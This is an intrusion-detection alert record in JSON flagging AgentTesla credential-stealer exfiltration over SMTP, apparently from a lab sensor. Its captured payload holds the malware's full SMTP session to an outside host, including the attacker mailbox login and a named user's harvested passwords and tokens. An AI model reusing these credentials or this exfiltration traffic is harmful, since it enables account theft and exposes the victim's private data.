{
  "pcap_cnt": 57,
  "src_port": 49815,
  "event_type": "alert",
  "app_proto_tc": "failed",
  "agent": {
    "type": "filebeat",
    "id": "9f305fa4-6db1-485c-81f9-598dce1469e3",
    "name": "mta-probe",
    "version": "7.17.10",
    "ephemeral_id": "b0104c46-cfdc-429d-8da2-19fe9b5658ab",
    "hostname": "mta-probe"
  },
  "tenant": 3,
  "input": {
    "type": "log"
  },
  "flow_id": 378995006020317,
  "capture_file": "/var/log/suricata/pcaps//log-0-1.pcap",
  "type": "json-log",
  "dest_ip": "173.254.28.237",
  "smtp": {
    "mail_from": "<oppong@expertsconsultgh.co>",
    "rcpt_to": [
      "<info@ledcenter.by>"
    ],
    "helo": "SANDERS-DESKTOP"
  },
  "@timestamp": "2023-09-25T23:11:30.621Z",
  "timestamp": "2023-09-26T01:11:30.621199+0200",
  "net_info": {
    "dest_agg": "internet",
    "src_agg": "private-class-a.internet",
    "src": [
      "Private class A",
      "Internet"
    ],
    "dest": [
      "Internet"
    ]
  },
  "alert": {
    "action": "allowed",
    "target": {
      "port": 49815,
      "ip": "10.10.25.101",
      "net_info": [
        "Private class A",
        "Internet"
      ],
      "net_info_agg": "private-class-a.internet"
    },
    "gid": 1,
    "signature_id": 2030171,
    "category": "A Network Trojan was detected",
    "rev": 1,
    "severity": 1,
    "signature": "ET MALWARE AgentTesla Exfil Via SMTP",
    "source": {
      "port": 587,
      "ip": "173.254.28.237",
      "net_info": [
        "Internet"
      ],
      "net_info_agg": "internet"
    },
    "metadata": {
      "attack_target": [
        "Client_Endpoint"
      ],
      "signature_severity": [
        "Major"
      ],
      "former_category": [
        "MALWARE"
      ],
      "affected_product": [
        "Windows_XP_Vista_7_8_10_Server_32_64_Bit"
      ],
      "deployment": [
        "Perimeter"
      ],
      "updated_at": [
        "2020_05_18"
      ],
      "created_at": [
        "2020_05_18"
      ],
      "malware_family": [
        "AgentTesla"
      ]
    }
  },
  "alerted": true,
  "dest_port": 587,
  "log": {
    "offset": 64880,
    "file": {
      "path": "/var/log/suricata/eve-alert.json"
    }
  },
  "tags": [
    "beats_input_codec_json_applied"
  ],
  "packet": "IOUqtpPxAAgCHEeuCABFAAAoQohAAIAGye0KChllrf4c7cKXAkszd1itFHA9NFAQ+PIl3AAA",
  "payload_printable": "EHLO SANDERS-DESKTOP\r\nAUTH login b3Bwb25nQGV4cGVydHNjb25zdWx0Z2guY28=\r\nT3Bwb25nLjIwMTI=\r\nMAIL FROM:<oppong@expertsconsultgh.co>\r\nRCPT TO:<info@ledcenter.by>\r\nDATA\r\nMIME-Version: 1.0\r\nFrom: oppong@expertsconsultgh.co\r\nTo: info@ledcenter.by\r\nDate: 25 Sep 2023 23:11:31 +0000\r\nSubject: PW_leon.r.sanders/SANDERS-DESKTOP\r\nContent-Type: text/html; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\nTime: 09/25/2023 23:11:29<br>User Name: leon.r.sanders<br>Compute=\r\nr Name: SANDERS-DESKTOP<br>OSFullName: Microsoft Windows 11 Pro<b=\r\nr>CPU: Intel(R) Core(TM) i5-13600K CPU @ 5.30GHz<br>RAM: 8191.05 =\r\nMB<br>IP Address: 173.66.46.112<br><hr>Host: https://amazon.com/<=\r\nbr>Username: 1687707994<br>Password: C^+QZp)Z5]U-Bw8_S&$5(GdH=3Dw=\r\nB;uA#!<br>Application: Edge Chromium<br><hr>Host: https://faceboo=\r\nk.com/<br>Username: 1687707994<br>Password: P+U_6BjqdbbZ(t!Dq#7s<=\r\nbr>Application: Edge Chromium<br><hr>Host: https://linkedin.com/<=\r\nbr>Username: leon.r.sanders@outlook.com<br>Password: pv9g_6Pm=3DY=\r\n5V-bnW`V2!Kr<br>Application: Edge Chromium<br><hr>Host: https://o=\r\nutlook.com/<br>Username: leon.r.sanders@outlook.com<br>Password: =\r\nNC9_R!j2-zzj+vrtSv$qYuX=3Dx9<br>Application: Edge Chromium<br><hr=\r\n>Host: LegacyGeneric:target=3DWindowsLive:(token):name=3Dleon.r.s=\r\nanders@outlook.com;serviceuri=3Daccount.live.com=00<br>Username: =\r\nleon.r.sanders@outlook.com=00<br>Password: <br>Application: Windo=\r\nws Credential<br><hr>Host: LegacyGeneric:target=3DMicrosoftAccoun=\r\nt:user=3Dleon.r.sanders@outlook.com=00<br>Username: leon.r.sander=\r\ns@outlook.com=00<br>Password: <br>Application: Windows Credential=\r\n<br><hr>Host: WindowsLive:target=3Dvirtualapp/didlogical=00<br>Us=\r\nername: 02rkfxyvuqfgdcei=00<br>Password: <br>Application: Windows=\r\n Credential<br><hr>Host: LegacyGeneric:target=3DOneDrive Cached C=\r\nredential=00<br>Username: 8236248c9154a91f=00<br>Password: 4D2E43=\r\n3130345F534E312E2D4351536B77576861596C316963564A593170384F3963455=\r\n7776F344A565275717766434F364E3238414C61492A704A556B38637536217169=\r\n765871517838454473786B32656B426B6E575166324872744778506D77216C793=\r\n54B36494A68724E72745532514F556D6972585053476153326B5A62647A545841=\r\n2A366A52655A75596563383332537A37554535575A4B5064442A69524D5A35503=\r\n1516E4E4D4B794D32537A4C345774556B446D6C7121526872596F4D4F597A464B=\r\n6F746D545A74676648374D755A4D57355751664C6E383175466C744A535731724=\r\n14F6A6D4D6334614E4B6875566F6C637A6355444A6D6B71573476714D62504F54=\r\n647821584D64446E4A33624B71554C73704D6B576B79516278355644354F4F6D7=\r\n44E74325A61545651357343495478657142336339786E5969624D703641715036=\r\n37504F4C51774F2159486B434270476249684572736C694271433024<br>Appli=\r\ncation: Windows Credential<br><hr>\r\n\r\n.\r\n",
  "see_name": "STS-500-QALAB-SSP",
  "packet_info": {
    "linktype": 1
  },
  "logger": "logstash-manager",
  "host": "mta-probe",
  "app_proto": "smtp",
  "ether": {
    "dest_mac": "20:e5:2a:b6:93:f1",
    "src_mac": "00:08:02:1c:47:ae"
  },
  "flow": {
    "start": "2023-09-26T01:11:29.153777+0200",
    "dest_ip": "173.254.28.237",
    "src_port": 49815,
    "pkts_toclient": 20,
    "bytes_toserver": 3461,
    "bytes_toclient": 1594,
    "pkts_toserver": 14,
    "dest_port": 587,
    "src_ip": "10.10.25.101"
  },
  "proto": "TCP",
  "stream": 1,
  "@version": "1",
  "email": {
    "has_exe_url": false,
    "url": [
      "https://outlook.com/",
      "https://linkedin.com/",
      "https://facebook.com/",
      "https://amazon.com/"
    ],
    "to": [
      "info@ledcenter.by"
    ],
    "status": "PARSE_DONE",
    "has_ipv4_url": false,
    "has_ipv6_url": false,
    "from": "oppong@expertsconsultgh.co"
  },
  "geoip": {
    "provider": {
      "autonomous_system_number": 46606,
      "autonomous_system_organization": "Unified Layer"
    },
    "country": {
      "name": "United States",
      "iso_code": "US",
      "geoname_id": 6252001
    },
    "city": {
      "geoname_id": 5780026,
      "name": "Provo"
    },
    "registered_country": {
      "name": "United States",
      "iso_code": "US",
      "geoname_id": 6252001
    },
    "postal": {
      "code": "84606"
    },
    "city_name": "Provo",
    "timezone": "America/Denver",
    "coordinate": [
      -111.6133,
      40.2181
    ],
    "location": {
      "lon": -111.6133,
      "lat": 40.2181
    },
    "continent": {
      "name": "North America",
      "code": "NA",
      "geoname_id": 6255149
    },
    "subdivisions": [
      {
        "name": "Utah",
        "iso_code": "UT",
        "geoname_id": 5549030
      }
    ],
    "country_code3": "US",
    "longitude": -111.6133,
    "country_name": "United States",
    "ip": "173.254.28.237",
    "latitude": 40.2181,
    "continent_code": "NA",
    "country_code2": "US"
  },
  "sig": {
    "updated": "2020-05-18",
    "created": "2020-05-18",
    "source": "etpro5-optimized"
  },
  "see_id": "6c2b59a0d0f2",
  "src_ip": "10.10.25.101",
  "_id": "p3gE1YoBCpozkosZmU36"
}